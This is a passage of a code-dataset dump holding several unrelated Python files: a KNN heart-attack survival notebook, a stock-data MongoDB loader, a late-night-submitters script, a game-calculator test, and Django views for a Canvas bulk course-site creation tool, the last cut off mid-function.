total number of rows and columns ')\r\nprint (Echocardiogram_df.shape)\r\n\r\nprint ('Print name of the columns ')\r\nprint(Echocardiogram_df.columns)\r\n\r\nEchocardiogram_df.drop(['E-point septal separation'],axis = 1, inplace= True)\r\nprint ('Print name of the columns ')\r\nprint(Echocardiogram_df.columns)\r\n\r\n# remove the space between the words \r\n# Changing the (' ') into (_) in column names\r\n\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.strip()\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.replace(' ','_')\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.replace('-','_')\r\nEchocardiogram_df.columns = Echocardiogram_df.columns.str.replace('\\n',' ')\r\nprint(Echocardiogram_df.columns)\r\n\r\nprint ('Check Type of the data ') \r\nprint(Echocardiogram_df.dtypes)\r\n\r\n\r\n# #checking the missing value per column to decide which column to drop? \r\n\r\nEchocardiogram_df = Echocardiogram_df.replace('[?]', np.NaN, regex = True)\r\nprint(Echocardiogram_df.isnull().sum())\r\nEchocardiogram_df.columns.tolist()\r\nEchocardiogram_df.drop(['alive_at_1'],axis= 1, inplace= True)\r\n\r\n\r\nprint(Echocardiogram_df.columns)\r\n\r\n# Try to drop the row where 3 columns out of 6 columns have all NaN values; row 32 has 3 NaN values, so we expect that row to be dropped.\r\n\r\nprint(Echocardiogram_df.dropna(subset=['age_at_heart_attack','fractional_shortening','left_ventricular_end_diastolic'],how ='all',inplace =True))\r\n\r\nEchocardiogram_df =Echocardiogram_df[['survival', 'age_at_heart_attack','pericardial_effusion','fractional_shortening', 'left_ventricular_end_diastolic', 'wall_motion_index','still_alive']].astype(float)\r\n\r\nprint ('Check Type of the data ') \r\nprint(Echocardiogram_df.dtypes)\r\n\r\n\r\nEchocardiogram_df ['age_at_heart_attack'] = Echocardiogram_df ['age_at_heart_attack'].astype(float)\r\nMeans = np.mean(Echocardiogram_df ['age_at_heart_attack'], axis=0)\r\nprint(Means)\r\nMeans_round = float(str(round(Means, 2)))\r\nEchocardiogram_df ['age_at_heart_attack']=Echocardiogram_df ['age_at_heart_attack'].replace(np.nan, Means_round)\r\n\r\nprint(Echocardiogram_df ['fractional_shortening'].dtypes)\r\nEchocardiogram_df ['fractional_shortening'] = Echocardiogram_df ['fractional_shortening'].astype(float)\r\nMedian = np.nanmedian(Echocardiogram_df.loc[:,\"fractional_shortening\"])\r\nprint(Median)\r\nIsNan = np.isnan(Echocardiogram_df.loc[:,\"fractional_shortening\"])\r\nEchocardiogram_df.loc[IsNan,\"fractional_shortening\"] = Median\r\nEchocardiogram_df ['wall_motion_index'].fillna(method ='ffill', inplace =True)\r\n\r\nEchocardiogram_df ['left_ventricular_end_diastolic'] = Echocardiogram_df ['left_ventricular_end_diastolic'].astype(float)\r\nMeans = np.mean(Echocardiogram_df ['left_ventricular_end_diastolic'], axis=0)\r\nprint(Means)\r\nMeans_round = float(str(round(Means, 2)))\r\nEchocardiogram_df ['left_ventricular_end_diastolic']=Echocardiogram_df ['left_ventricular_end_diastolic'].replace(np.nan, Means_round)\r\n\r\nEchocardiogram_df ['survival'].fillna(method ='ffill', inplace =True)\r\nprint(Echocardiogram_df.isnull().sum())\r\n\r\n# I am going to remove the outliers from the columns below, which could have been entered wrongly.\r\n# \r\n# 'FRACTIONAL_SHORTENING' - lower numbers are increasingly abnormal\r\n# 'LEFT_VENTRICULAR_END_DIASTOLIC' - Size of heart\r\n\r\ndef outliers(data):\r\n    q1= np.percentile(data,25)\r\n    q3 = np.percentile(data,75)\r\n    lower = q1-1.5*(q3-q1)\r\n    upper = q3+1.5*(q3-q1)\r\n    flag =(data <= lower)|(data >= 
upper)\r\n    q2 = np.median(data)\r\n    data[flag] = q2\r\n    return(data)\r\n\r\nEchocardiogram_df ['fractional_shortening'] = outliers (Echocardiogram_df ['fractional_shortening'])\r\nEchocardiogram_df ['left_ventricular_end_diastolic']= outliers (Echocardiogram_df ['left_ventricular_end_diastolic'])\r\nEchocardiogram_df.head(25)\r\n\r\nx= np.ravel(Echocardiogram_df ['fractional_shortening'])\r\nX= pd.DataFrame(x)\r\ndata = MinMaxScaler().fit_transform(X)\r\nEchocardiogram_df ['fractional_shortening']=data\r\nprint(Echocardiogram_df ['fractional_shortening'])\r\n\r\nx= np.ravel(Echocardiogram_df ['left_ventricular_end_diastolic'])\r\nX= pd.DataFrame(x)\r\ndata = MinMaxScaler().fit_transform(X)\r\nEchocardiogram_df ['left_ventricular_end_diastolic']=data\r\nprint(Echocardiogram_df ['left_ventricular_end_diastolic'])\r\n\r\nx= np.ravel(Echocardiogram_df ['wall_motion_index'])\r\nX= pd.DataFrame(x)\r\ndata = MinMaxScaler().fit_transform(X)\r\nEchocardiogram_df ['wall_motion_index']=data\r\nprint(Echocardiogram_df ['wall_motion_index'])\r\n\r\nEchocardiogram_df.head(25).round(3)\r\n\r\n# let's reduce this range by applying binning to get a more accurate result.\r\nNB =5\r\nx= np.ravel(Echocardiogram_df ['survival'])\r\nX= pd.DataFrame(x)\r\n\r\nbounds = np.linspace(np.min(x), np.max(x), NB + 1)\r\nprint (bounds)\r\n\r\ndef bin(x, b):\r\n    nb = len(b)\r\n    N = len(x)\r\n    y = np.empty(N, int)\r\n\r\n    for i in range(1, nb):\r\n        y[(x >= b[i-1])&(x < b[i])] = i\r\n\r\n    y[x == b[-1]] = nb - 1\r\n    return y\r\n\r\nbx = bin(x, bounds)\r\nprint (\"\\n\\nBinned variable x, for \", NB, \"bins\\n\")\r\nprint (\"Bin boundaries: \", bounds)\r\nprint (\"Binned variable: \", bx)\r\n\r\nEchocardiogram_df['survival'] = bx\r\n\r\n\r\nNB =5\r\nx= np.ravel(Echocardiogram_df ['age_at_heart_attack'])\r\nX= pd.DataFrame(x)\r\n\r\nbounds = np.linspace(np.min(x), np.max(x), NB + 1)\r\nprint (bounds)\r\n\r\ndef bin(x, b):\r\n    nb = len(b)\r\n    N = len(x)\r\n    y = np.empty(N, int)\r\n\r\n    for i in range(1, nb):\r\n        y[(x >= b[i-1])&(x < b[i])] = i\r\n\r\n    y[x == b[-1]] = nb - 1\r\n    return y\r\n\r\nbx = bin(x, bounds)\r\nprint (\"\\n\\nBinned variable x, for \", NB, \"bins\\n\")\r\nprint (\"Bin boundaries: \", bounds)\r\nprint (\"Binned variable: \", bx)\r\n\r\nEchocardiogram_df['age_at_heart_attack'] = bx\r\n\r\n\r\nEchocardiogram_df.head(3)\r\nEchocardiogram_df.round(3)\r\n\r\n# Packages for visuals\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nsns.set(font_scale=1.2)\r\n\r\n# Allows charts to appear in the notebook\r\nget_ipython().magic('matplotlib inline')\r\n\r\nsns.lmplot('fractional_shortening','left_ventricular_end_diastolic', data=Echocardiogram_df, hue='still_alive',\r\n           palette='Set1', fit_reg=False, scatter_kws={\"s\": 30});\r\n\r\n\r\n# visualize the relationship between the features and the response using scatterplots\r\nsns.set(font_scale=1.5)\r\nsns.pairplot(Echocardiogram_df, hue =\"still_alive\", palette ='Set1')\r\nplt.show()\r\n\r\n#define X and y\r\nX= Echocardiogram_df[['survival','age_at_heart_attack','pericardial_effusion','fractional_shortening','left_ventricular_end_diastolic', 'wall_motion_index']].values\r\ny= Echocardiogram_df['still_alive']\r\n\r\n#Split the dataset into two pieces: a training set and a testing set.\r\n# Train the model on the training set.\r\n# Test the model on the testing set, and evaluate how well 
we did.\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1, test_size =.3)\r\n\r\nprint(X_train.shape)\r\n\r\nprint(X_test.shape)\r\nprint(y_train.shape)\r\n\r\nprint(y_test.shape)\r\n\r\n\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=5)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\n\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n#Repeat for KNN with K=1:\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=1)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\n\r\n\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n#Repeat for KNN with K=2:\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=2)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n# try K=1 through K=25 and record testing accuracy\r\nk_range = list(range(1, 26))\r\nscores = []\r\nfor k in k_range:\r\n    knn = KNeighborsClassifier(n_neighbors=k)\r\n    knn.fit(X_train, y_train)\r\n    y_pred = knn.predict(X_test)\r\n    scores.append(accuracy_score(y_test, y_pred))\r\n\r\n# import Matplotlib (scientific plotting library)\r\nimport matplotlib.pyplot as plt\r\n\r\n# allow plots to appear within the notebook\r\nget_ipython().magic('matplotlib inline')\r\n\r\n# plot the relationship between K and testing accuracy\r\nplt.plot(k_range, scores)\r\nplt.xlabel('Value of K for KNN')\r\nplt.ylabel('Testing Accuracy')\r\n\r\n\r\n# The graph shows that I can pick any number between 13 and 23. Let's take K = 15\r\n#Repeat for KNN with K=15:\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nknn = KNeighborsClassifier(n_neighbors=15)\r\nprint(knn)\r\nknn.fit(X_train,y_train)\r\ny_pred = knn.predict(X_test)\r\nprint(accuracy_score(y_test, y_pred))\r\n\r\n\r\n# Create a function to guess whether a patient is alive or dead\r\ndef Alive_or_Dead(survival,age_at_heart_attack,pericardial_effusion,fractional_shortening,\r\n                  left_ventricular_end_diastolic,wall_motion_index):\r\n    \r\n    if(knn.predict([[survival,age_at_heart_attack,pericardial_effusion,fractional_shortening,\r\n                     left_ventricular_end_diastolic,wall_motion_index]]))==0:\r\n        print('You\\'re looking at an alive person!')\r\n    else:\r\n        print('You\\'re looking at a dead person!')\r\n# Predict whether the person is alive or not\r\nAlive_or_Dead(3,1,.1,.448,.22,.135)\r\n\r\n# compare actual response values (y_test) with predicted response values (y_pred)\r\nAR =accuracy_score(y_test, y_pred)\r\nprint(AR)\r\n\r\n# \r\n# All the patients suffered heart attacks at some point in the past.\r\n# Some are still alive and some are not. The survival and still-alive\r\n# variables, when taken together, indicate whether a patient survived\r\n# for at least one year following the heart attack.\r\n# \r\n# What am I going to predict?\r\n# Is the patient still alive or dead?\r\n# \r\n# \r\n# There is an outcome we are trying to predict - Supervised learning\r\n# These are the steps to classify the survival rate of the patient. 
\r\n# \r\n# 1. Find the data\r\n# 2. Apply a data science model\r\n# 3. Review the results\r\n'''\r\nImport statements for libraries\r\nLoaded the dataset\r\nUsed MinMax scaling to normalize the data\r\nUsed a KNN classifier with parameters\r\nOutput of the predicted and actual values seems to be correct\r\n'''\r\n\r\n# \r\n","sub_path":"TruptiGandhi-L08-DataModelBuild_Final-2.py","file_name":"TruptiGandhi-L08-DataModelBuild_Final-2.py","file_ext":"py","file_size_in_byte":11338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"185562824","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\"\"\"\n@version: 1.0\n@author: 'user'\n@license: Apache Licence \n@contact: hrbuy2012@163.com\n@site: \n@software: PyCharm\n@file: geti_fundametal_fromiwencai.py\n@time: 2017/11/4 15:11\n\"\"\"\nimport sys\nimport pandas as pd\nfrom db_manager import mongo_manager\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n# iwencai_data_path = 'D://{0}.xls'.format(pd.Timestamp.now().strftime(\"%Y-%m-%d\"))\niwencai_data_path = 'D://历史数据//{0}.xls'.format(\"每股净资产2017\")\n# info_type = \"per_share\"  # basic earnings per share\n# info_des = \"基本每股收益\"\n# info_type = \"weight_roe\"  # weighted ROE\n# info_des = \"加权净资产收益率\"\n# info_type = \"net_cash_flow\"  # net operating cash flow\n# info_des = \"经营现金流量净额\"\n# info_type = \"net_profit\"  # net profit\n# info_des = \"净利润\"\n# info_type = \"net_profit_growth\"  # net profit YoY growth rate\n# info_des = \"净利润同比增长率\"\n# info_type = \"net_assets\"  # net assets\n# info_des = \"净资产\"\n# info_type = \"per_share_cash\"  # cash flow per share\n# info_des = \"每股现金流\"\n# info_type = \"publish_roe\"  # diluted ROE\n# info_des = \"摊薄净资产收益率\"\n# info_type = \"roic\"  # return on invested capital\n# info_des = \"投入资本回报率\"\n# info_type = \"interest_rate\"  # net profit margin on sales\n# info_des = \"销售净利率\"\n# info_type = \"gross_margin\"  # gross profit margin on sales\n# info_des = \"销售毛利率\"\n# info_type = \"revenue\"  # operating revenue\n# info_des = \"营业收入\"\n# info_type = \"revenue_growth\"  # operating revenue YoY growth rate\n# info_des = \"营业收入(同比增长率)\"\n# info_type = \"capital_expend\"  # capital expenditure\n# info_des = \"购建固定资产、无形资产和其他长期资产支付的现金\"\n# info_type = \"assets_liabilities_ratio\"  # debt-to-asset ratio\n# info_des = \"资产负债率\"\ninfo_type = \"per_net_asset\"  # net assets per share\ninfo_des = \"每股净资产\"\n\n# basic EPS for 24 consecutive quarters; the next line is the literal iwencai query, kept verbatim\n# 2005年1季度2季度3季度4季度每股净资产 2006年1季度2季度3季度4季度每股净资产 2007年1季度2季度3季度4季度每股净资产 2008年1季度2季度3季度4季度每股净资产 2009年1季度2季度3季度4季度每股净资产 2010年1季度2季度3季度4季度每股净资产\n\ndef update_iwencai_data_all():\n    # connect to the finance_robot database\n    mongo_mg = mongo_manager.Mongo_Manager('finance_robot')\n    # iwencai_data_download(iwencai_data_path)\n    iwencai_data = pd.read_html(iwencai_data_path)\n    iwencai_data = iwencai_data[0] if iwencai_data else pd.DataFrame()\n    rename_dict = {}\n    new_columns_list = iwencai_data.iloc[0].tolist()\n    for i in range(len(new_columns_list)):\n        rename_dict.update({i: new_columns_list[i]})\n    iwencai_data.rename(columns=rename_dict, inplace=True)\n    iwencai_data = iwencai_data.drop(0)\n    iwencai_data = iwencai_data.replace('--', float(0))\n    current_time = pd.Timestamp.now().strftime(\"%Y%m%d %H:%M:%S\")\n    for line in range(len(iwencai_data)):\n        line_info = iwencai_data.iloc[line].to_dict()\n        stock_code = str(line_info.get(u'股票代码')).split('.')[0]\n        stock_name = str(line_info.get(u'股票简称'))\n        for key, item in line_info.items():\n            insert_info = dict(code=stock_code, name=stock_name, update_time=current_time)\n            if key == '股票代码' or key == '股票简称':\n                continue\n            elif info_des in key:\n                report_date = get_date(key)\n                mongo_id = 'iwencai_' + str(insert_info[\"code\"]) + \"_\" + report_date\n                insert_info.update({\"_id\": mongo_id, \"date\": report_date, info_type: float(item)})\n                
# where condition used for the update\n                update_where = {\"code\": insert_info[\"code\"], \"_id\": mongo_id}\n                try:\n                    mongo_mg.pd_insertone_mongo('i_mental_infos', insert_info, update_where)\n                except Exception as e:\n                    print(e, insert_info)\n            else:\n                print('error::', key, item)\n\ndef get_date(column_name):\n    real_date = column_name.split(')')[1]\n    # real_date = column_name[-10:]\n    real_date = real_date.replace('.', '')\n    return real_date\n\ndef update_industry():\n    \"\"\"Fill in the industry and concept fields\"\"\"\n    # connect to the finance_robot database\n    mongo_mg = mongo_manager.Mongo_Manager('finance_robot')\n    code_list = mongo_mg.pd_read_mongo('i_mental_infos', {\"date\": \"20170930\"}).sort_values(by=['code'], ascending=1)['code'].tolist()\n    iwencai_data = update_industry_fromwencai()\n    for code in code_list:\n        try:\n            stock_conception = iwencai_data[iwencai_data.code == code]['conception'].tolist()[0]\n        except:\n            stock_conception = \"暂无概念\"  # literally \"no concepts yet\"\n        try:\n            stock_industry = mongo_mg.pd_read_mongo('iwencai_mental_infos', {\"code\": code})['industry'].tolist()[0]\n        except:\n            print(code)\n            try:\n                stock_industry = iwencai_data[iwencai_data.code == code]['industry'].tolist()[0]\n            except Exception as e:\n                print(e, '######### errorcode ', code)\n        # print stock_industry\n        update_where = {\"code\": code}\n        update_info = {\"industry\": stock_industry, \"conception\": stock_conception}\n        try:\n            mongo_mg.pd_insertall_mongo('i_mental_infos', update_info, update_where)\n        except Exception as e:\n            print(e)\n\ndef update_industry_fromwencai():\n    # columns: stock code, stock short name, Tonghuashun (iwencai) industry, concepts\n    iwencai_data_path = \"D:\\\\2017-11-16.xls\"\n    iwencai_data = pd.read_html(iwencai_data_path)\n    iwencai_data = iwencai_data[0] if iwencai_data else pd.DataFrame()\n    rename_dict = {}\n    new_columns_list = ['code', 'name', 'industry', 'conception']\n    for i in range(len(new_columns_list)):\n        rename_dict.update({i: new_columns_list[i]})\n    iwencai_data.rename(columns=rename_dict, inplace=True)\n    iwencai_data = iwencai_data.drop(0)\n    iwencai_data = iwencai_data.replace('--', float(0))\n    iwencai_data['code'] = iwencai_data['code'].apply(lambda x: x.split(\".\")[0])\n    return iwencai_data\n\n\nif __name__ == \"__main__\":\n    # update_iwencai_data_all()\n    update_industry()\n\n","sub_path":"data_collection/data_from_iwencai/geti_fundametal_fromiwencai.py","file_name":"geti_fundametal_fromiwencai.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"589770053","text":"import requests\nfrom datetime import datetime, time\nfrom pytz import timezone\n\n\ndef load_attempts():\n    devman_feed = 'https://devman.org/api/challenges/solution_attempts'\n    pages = requests.get(devman_feed, params={'page':1}).json()['number_of_pages']\n\n    for page in range(1, pages + 1):\n        response = requests.get(devman_feed, params={'page': page}).json()\n        yield from response['records']\n\n\ndef is_midnighter(attempt, hour_begin_night=0, hour_end_night=7):\n    users_timestamp = attempt['timestamp']\n\n    if users_timestamp:\n        users_timezone = attempt['timezone']\n        users_time = datetime.fromtimestamp(\n            users_timestamp,\n            timezone(users_timezone)\n        ).time()\n        return time(hour_begin_night, 0) < users_time < time(hour_end_night, 0)\n\n\ndef get_midnighters():\n    users = {record['username'] for record in load_attempts() if is_midnighter(record)}\n    return users\n\n\ndef output_user_owl(users):\n    for user_index, user in enumerate(users, 1):\n        print('{} {}'.format(user_index, user))\n\n\nif __name__ == '__main__':\n    owls = get_midnighters()\n    
output_user_owl(owls)\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"147204443","text":"import os\nimport sys\nsys.path.insert(1, os.path.join(sys.path[0], '../../..'))\nimport app.calculator.calculator as calc\nfrom app import testing_helpers\n\n\nattacker, defender, options, tol = testing_helpers.defaults()\n\n# target source: http://alphamou.se/ti4calc/\ntarget = [53, 0, 46] # target percentages; [tie, attacker, defender]\nprint(\"1 Flagship 2 Fighter [Naalu] vs 2 Infantry\")\n\n# Units\nattacker[\"flagship\"] = 1\nattacker[\"fighter\"] = 2\ndefender[\"infantry\"] = 2\n\n# Factions\noptions[\"att_faction\"] = \"Naalu\"\n\n# Ground Combat\noptions[\"ground_combat\"] = True\n\n# Options\n\noutcomes = calc.calculate(attacker, defender, options)\ntesting_helpers.evaluate(outcomes, target, tol)\n","sub_path":"app/tests/faction_units/Naalu_flagship.py","file_name":"Naalu_flagship.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"209016645","text":"import logging\nimport json\n\nfrom django.shortcuts import redirect\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom django.conf import settings\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils import timezone\n\nfrom ims_lti_py.tool_config import ToolConfig\n\nfrom icommons_common.models import School, Term, Department, CourseGroup, Person\nfrom icommons_common.canvas_api.helpers import accounts as canvas_api_accounts\nfrom icommons_common.auth.lti_decorators import has_account_permission\n\nfrom canvas_course_site_wizard.models import BulkCanvasCourseCreationJob, CanvasCourseGenerationJob\n\nfrom .models import (\n get_course_instance_query_set,\n get_course_instance_summary_data,\n get_course_job_summary_data\n)\nfrom .utils import (\n get_school_data_for_user,\n get_term_data_for_school,\n get_department_data_for_school,\n get_course_group_data_for_school,\n get_term_data,\n get_canvas_site_templates_for_school,\n get_canvas_site_template\n)\n\n\nlogger = logging.getLogger(__name__)\n\nCOURSE_INSTANCE_FILTERS = ['school', 'term', 'department', 'course_group']\n\n\ndef lti_auth_error(request):\n raise PermissionDenied\n\n\n@require_http_methods(['GET'])\ndef tool_config(request):\n env = settings.ENV_NAME if hasattr(settings, 'ENV_NAME') else ''\n url = \"%s://%s%s\" % (\n request.scheme,\n request.get_host(),\n reverse('bulk_site_creation:lti_launch', exclude_resource_link_id=True)\n )\n lti_tool_config = ToolConfig(\n title=\"Canvas Site Creator %s\" % env,\n launch_url=url,\n secure_launch_url=url,\n description=\"This LTI tool provides canvas site creation functionality.\"\n )\n\n # this is how to tell Canvas that this tool provides an account navigation link:\n lti_tool_config.set_ext_param('canvas.instructure.com', 'account_navigation', {\n 'enabled': 'true',\n 'text': \"Canvas Site Creator %s\" % env\n })\n lti_tool_config.set_ext_param('canvas.instructure.com', 'privacy_level', 'public')\n\n return HttpResponse(lti_tool_config.to_xml(), content_type='text/xml', 
status=200)\n\n\n@login_required\n@require_http_methods(['POST'])\n@csrf_exempt\ndef lti_launch(request):\n    logger.debug(\"bulk_site_creation launched with params: %s\", json.dumps(request.POST.dict(), indent=4))\n    return redirect('bulk_site_creation:index')\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef index(request):\n    canvas_user_id = request.LTI['custom_canvas_user_id']\n    sis_account_id = request.LTI['custom_canvas_account_sis_id']\n    ci_filters = {key: request.GET.get(key, '') for key in COURSE_INSTANCE_FILTERS}\n    (account_type, _) = canvas_api_accounts.parse_canvas_account_id(sis_account_id)\n    schools = []\n    terms = []\n    departments = []\n    course_groups = []\n    school = None\n\n    if account_type in canvas_api_accounts.ACCOUNT_TYPES:\n        # We are in the context of a SIS type account, so limit options to that context\n        school_id = sis_account_id\n        if account_type == canvas_api_accounts.ACCOUNT_TYPE_DEPARTMENT:\n            department = canvas_api_accounts.get_account_by_sis_account_id(canvas_user_id, sis_account_id)\n            department_id = department['sis_account_id']\n            school_id = department['parent_account_id']\n            ci_filters[canvas_api_accounts.ACCOUNT_TYPE_DEPARTMENT] = department_id\n            departments.append(get_department_data_for_school(canvas_user_id, school_id, department_id))\n        elif account_type == canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP:\n            course_group = canvas_api_accounts.get_account_by_sis_account_id(canvas_user_id, sis_account_id)\n            course_group_id = course_group['sis_account_id']\n            school_id = course_group['parent_account_id']\n            ci_filters[canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP] = course_group_id\n            course_groups.append(get_course_group_data_for_school(canvas_user_id, school_id, course_group_id))\n        school = get_school_data_for_user(canvas_user_id, school_id)\n        ci_filters[canvas_api_accounts.ACCOUNT_TYPE_SCHOOL] = school['id']\n        schools.append(school)\n    else:\n        # We are outside the context of a SIS type account, so show all schools\n        # that the user has permission to create courses for\n        schools = get_school_data_for_user(canvas_user_id)\n        school_sis_account_id = ci_filters.get('school')\n        if school_sis_account_id:\n            school = get_school_data_for_user(canvas_user_id, school_sis_account_id)\n\n    if len(schools) == 0:\n        return redirect('not_authorized')\n\n    if school:\n        # Populate term, department, and course_group filter options if we already have a school\n        school_sis_account_id = school['id']\n        terms = get_term_data_for_school(school_sis_account_id)\n        if not departments and not course_groups:\n            departments = get_department_data_for_school(canvas_user_id, school_sis_account_id)\n            course_groups = get_course_group_data_for_school(canvas_user_id, school_sis_account_id)\n\n    return render(request, 'bulk_site_creation/index.html', {\n        'filters': ci_filters,\n        'schools': schools,\n        'terms': terms,\n        'departments': departments,\n        'course_groups': course_groups\n    })\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef audit(request):\n    canvas_user_id = request.LTI['custom_canvas_user_id']\n    sis_account_id = request.LTI['custom_canvas_account_sis_id']\n    (account_type, account_id) = canvas_api_accounts.parse_canvas_account_id(sis_account_id)\n\n    filter_kwargs = {}\n    if account_type == canvas_api_accounts.ACCOUNT_TYPE_SCHOOL:\n        filter_kwargs['school_id'] = account_id\n    elif account_type == 
canvas_api_accounts.ACCOUNT_TYPE_DEPARTMENT:\n        filter_kwargs['sis_department_id'] = account_id\n    elif account_type == canvas_api_accounts.ACCOUNT_TYPE_COURSE_GROUP:\n        filter_kwargs['sis_course_group_id'] = account_id\n\n    query_set = BulkCanvasCourseCreationJob.objects.filter(**filter_kwargs).order_by('-created_at')\n\n    jobs = []\n    creator_ids = set()\n    school_ids = set()\n    term_ids = set()\n    department_ids = set()\n    course_group_ids = set()\n    for bulk_job in query_set:\n        jobs.append(bulk_job)\n        creator_ids.add(bulk_job.created_by_user_id)\n        school_ids.add(bulk_job.school_id)\n        term_ids.add(bulk_job.sis_term_id)\n        if bulk_job.sis_department_id:\n            department_ids.add(bulk_job.sis_department_id)\n        if bulk_job.sis_course_group_id:\n            course_group_ids.add(bulk_job.sis_course_group_id)\n\n    creators = {p.univ_id: p for p in Person.objects.filter(univ_id__in=creator_ids)}\n    schools = School.objects.in_bulk(school_ids)\n    terms = Term.objects.in_bulk(term_ids)\n    departments = {}\n    if department_ids:\n        departments = {\n            id: name for id, name in Department.objects.filter(\n                department_id__in=department_ids\n            ).values_list('department_id', 'name')\n        }\n    course_groups = {}\n    if course_group_ids:\n        course_groups = {\n            id: name for id, name in CourseGroup.objects.filter(\n                course_group_id__in=course_group_ids\n            ).values_list('course_group_id', 'name')\n        }\n\n    bulk_job_data = []\n    for bulk_job in jobs:\n        try:\n            creator = creators[bulk_job.created_by_user_id]\n            creator_name = \"%s, %s\" % (creator.name_last, creator.name_first)\n        except KeyError:\n            # Bulk job creator could not be found\n            logger.warning(\"Failed to find bulk canvas site job creator %s\", bulk_job.created_by_user_id)\n            creator_name = ''\n\n        school = schools[bulk_job.school_id]\n        term = terms[bulk_job.sis_term_id]\n        department = ''\n        if bulk_job.sis_department_id:\n            department = departments[bulk_job.sis_department_id]\n        course_group = ''\n        if bulk_job.sis_course_group_id:\n            course_group = course_groups[bulk_job.sis_course_group_id]\n        template_canvas_course = get_canvas_site_template(school.school_id, bulk_job.template_canvas_course_id)\n\n        bulk_job_data.append({\n            'id': bulk_job.id,\n            'created_at': timezone.localtime(bulk_job.created_at).strftime('%b %d, %Y %H:%M:%S'),\n            'status': bulk_job.status_display_name,\n            'created_by': creator_name,\n            'term': term.display_name,\n            'school': school.title_short,\n            'subaccount': department if department else course_group,\n            'template_canvas_course': template_canvas_course,\n            'count_course_jobs': CanvasCourseGenerationJob.objects.filter(bulk_job_id=bulk_job.id).count()\n        })\n\n    return render(request, 'bulk_site_creation/audit.html', {\n        'bulk_job_data': bulk_job_data\n    })\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef course_selection(request):\n    canvas_user_id = request.LTI['custom_canvas_user_id']\n    ci_filters = {key: request.GET.get(key, '') for key in COURSE_INSTANCE_FILTERS}\n\n    try:\n        school = get_school_data_for_user(canvas_user_id, ci_filters['school'])\n        term = get_term_data(ci_filters['term'])\n    except KeyError:\n        # return the redirect response; without the return the redirect has no effect\n        return redirect('bulk_site_creation:index')\n\n    (account_type, school_id) = canvas_api_accounts.parse_canvas_account_id(school['id'])\n    canvas_site_templates = get_canvas_site_templates_for_school(school_id)\n\n    account = school\n    department = {}\n    if ci_filters['department']:\n        department = get_department_data_for_school(canvas_user_id, school['id'], ci_filters['department'])\n        account = department\n    
course_group = {}\n if ci_filters['course_group']:\n course_group = get_course_group_data_for_school(canvas_user_id, school['id'], ci_filters['course_group'])\n account = course_group\n\n ci_query_set = get_course_instance_query_set(term['id'], account['id'])\n course_instance_summary = get_course_instance_summary_data(ci_query_set)\n\n return render(request, 'bulk_site_creation/course_selection.html', {\n 'filters': ci_filters,\n 'school': school,\n 'term': term,\n 'department': department,\n 'course_group': course_group,\n 'canvas_site_templates': canvas_site_templates,\n 'course_instance_summary': course_instance_summary\n })\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['POST'])\ndef create_job(request):\n canvas_user_id = request.LTI['custom_canvas_user_id']\n logged_in_user_id = request.LTI['lis_person_sourcedid']\n data = json.loads(request.POST['data'])\n\n template_canvas_course_id = data.get('template')\n filters = data['filters']\n term = filters.get('term')\n\n school_account_id = filters['school']\n account_id = school_account_id\n (account_type, school_id) = canvas_api_accounts.parse_canvas_account_id(school_account_id)\n\n department = None\n department_account_id = filters.get('department')\n if department_account_id:\n account_id = department_account_id\n (account_type, department) = department_account_id.split(':')\n\n course_group = None\n course_group_account_id = filters.get('course_group')\n if course_group_account_id:\n account_id = course_group_account_id\n (account_type, course_group) = course_group_account_id.split(':')\n\n # Check permissions for selected account\n if not canvas_api_accounts.has_permission(\n canvas_user_id, account_id, canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES):\n logger.info(\n 'Failed to create bulk job for user %s and account %s: Missing %s permission',\n canvas_user_id,\n account_id,\n canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES\n )\n raise PermissionDenied\n\n created_by_user_id = 